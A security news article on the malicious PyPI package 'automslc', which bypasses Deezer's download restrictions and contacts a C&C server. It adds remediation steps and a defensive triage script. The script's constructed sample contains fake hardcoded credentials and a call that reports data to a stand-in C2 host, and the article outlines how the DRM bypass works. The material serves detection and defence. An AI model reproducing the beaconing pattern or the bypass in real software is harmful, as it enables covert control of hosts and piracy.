Cybersecurity researchers at Socket have uncovered a significant security threat in the Python Package Index (PyPI), identifying a malicious package named “automslc” that has accumulated over 100,000 downloads since 2019. The package has been specifically designed to bypass Deezer’s security measures, enabling unauthorized access to protected content on the popular music streaming platform that serves users across 180 countries.
Technical Analysis of the Malicious Package
Socket's analysis found that automslc ships with hardcoded credentials for a Deezer account. It uses those, or a login the user supplies, to open an authenticated session against Deezer's API. Accepting either source of credentials keeps the tool working for people who have no Deezer account of their own while still letting account holders use it, which widens its reach.
Once authenticated, the package retrieves track metadata and the tokens needed to decrypt audio. In particular it obtains Deezer's MD5_ORIGIN token, which Deezer uses to build the protected URLs for track downloads, and it calls internal API endpoints to get around the standard preview-only restriction so that full audio files can be downloaded.
Security Implications and Infrastructure Abuse
Although the package's primary purpose is unauthorized music downloading, Socket's analysis points to a broader concern: automslc communicates with a command-and-control (C&C) server, giving its operator a channel to instruct the installed copies. Infrastructure of that kind is not tied to piracy. A population of hosts that accept instructions from one operator could be repurposed for coordinated attacks or used as a distributed attack network.
Threat Actor Profile and Operational Patterns
The package's maintainer, who uses the aliases “hoabt2” and “Thanh Hoa,” actively monitors and coordinates what users of the package do, which points to an organized operation rather than a one-off exploit. Security analysts consider that a high-risk indicator that the activity could escalate into more serious attacks.
Any Python project that installed automslc should treat the affected hosts as having run untrusted code with network access: the package takes instructions from an operator-controlled C&C server, so what it did on a given machine cannot be established from its source alone. Teams should confirm whether it is present (pip show automslc reports the installed version; pip uninstall automslc removes it), review proxy and firewall logs for unexpected outbound connections from Python processes, and, if anyone typed their own Deezer login into the tool, change that password. Going forward, screen new dependencies before they reach production. Socket flags behavioral signals such as embedded credentials and C&C traffic; pip-audit and Semgrep Supply Chain check dependencies against known-vulnerability databases, which is valuable but only catches a package like this once an advisory for it has been published.
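As an added example (not Socket's scanner and not code from automslc), the script below performs the triage the preceding paragraph describes and looks for the hardcoded-credential pattern described under Technical Analysis: it parses a package's Python source with the ast module to find string literals bound to credential-like names, lists the hostnames the code contacts so they can be compared against egress logs, and checks the installed distribution list against a denylist. The sample source it runs on is constructed here, with reserved .invalid hostnames and made-up values; it is not automslc's code.

```python
"""Triage a suspect Python package: hardcoded credentials, outbound hosts,
and whether a denylisted distribution is installed.

Added example for this article; not Socket's scanner and not automslc's code.
"""
import ast
import re
from importlib import metadata
from urllib.parse import urlparse

# Identifier fragments that usually carry a secret. Matching is by substring on
# the underscore-stripped, lower-cased name, so SERVICE_PASSWORD, api_key and
# authToken all match. Widen or narrow the list for your own code base.
SECRET_FRAGMENTS = ("password", "passwd", "secret", "token", "apikey", "credential")
MIN_SECRET_LEN = 4  # ignore "" and other obvious placeholders
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def _is_secret_name(name: str) -> bool:
    norm = name.replace("_", "").lower()
    return any(frag in norm for frag in SECRET_FRAGMENTS)


def _literal_str(node):
    """Return the value of a string-literal AST node, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def find_hardcoded_credentials(source: str):
    """Return sorted (name, line) pairs for non-trivial string literals bound
    to credential-like names by assignment, keyword argument or dict key.
    Values are deliberately not returned, so a report does not leak them."""
    hits = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign):
            val = _literal_str(node.value)
            for tgt in node.targets:
                name = getattr(tgt, "id", None) or getattr(tgt, "attr", None)
                if name and _is_secret_name(name) and val and len(val) >= MIN_SECRET_LEN:
                    hits.add((name, node.lineno))
        elif isinstance(node, ast.Call):
            for kw in node.keywords:
                val = _literal_str(kw.value)
                if kw.arg and _is_secret_name(kw.arg) and val and len(val) >= MIN_SECRET_LEN:
                    hits.add((kw.arg, node.lineno))
        elif isinstance(node, ast.Dict):
            for key, value in zip(node.keys, node.values):
                kname, val = _literal_str(key), _literal_str(value)
                if kname and _is_secret_name(kname) and val and len(val) >= MIN_SECRET_LEN:
                    hits.add((kname, node.lineno))
    return sorted(hits, key=lambda h: (h[1], h[0]))


def find_outbound_hosts(source: str):
    """Hostnames of every URL literal in the source, for comparison with
    proxy/firewall egress logs."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(source)}
    return sorted(h for h in hosts if h)


def _normalize(name: str) -> str:
    # PEP 503 normalisation: AutoMSLC, auto_mslc and automslc compare equal.
    return re.sub(r"[-_.]+", "-", name).lower()


def denylisted_installed(installed, denylist=("automslc",)):
    """Names from `installed` whose normalised form is on the denylist."""
    bad = {_normalize(n) for n in denylist}
    return sorted(n for n in installed if _normalize(n) in bad)


def installed_distribution_names():
    """Distribution names in the current environment (what pip list shows)."""
    names = (d.metadata.get("Name") for d in metadata.distributions())
    return [n for n in names if n]


# Constructed sample in the shape the article describes: an embedded account,
# a login against an internal API, and a server the client reports back to.
# Hostnames use the reserved .invalid TLD; nothing here is automslc's code.
SAMPLE_SOURCE = '''
import requests
SERVICE_EMAIL = "bot-account@example.invalid"
SERVICE_PASSWORD = "s3cretpassw0rd"
session = requests.Session()
session.post("https://api.example.invalid/login",
             data={"email": SERVICE_EMAIL, "password": SERVICE_PASSWORD})
cfg = {"api_key": "abcdef123456"}
def report(status):
    session.post("http://c2.example.invalid/report", json={"status": status})
'''

if __name__ == "__main__":
    print("credential-like literals:", find_hardcoded_credentials(SAMPLE_SOURCE))
    print("hosts contacted:", find_outbound_hosts(SAMPLE_SOURCE))
    print("denylisted packages installed:",
          denylisted_installed(installed_distribution_names()))
```

To run it against a real installation, feed each .py file under the package's directory in site-packages to find_hardcoded_credentials and find_outbound_hosts, then check the returned hostnames against your egress logs. A static pass like this only sees what is in the source: a client that fetches its instructions from a C&C server at runtime, or that obfuscates its strings, will show little more than the C&C hostname, which is exactly why the log review in the preceding paragraph is not optional.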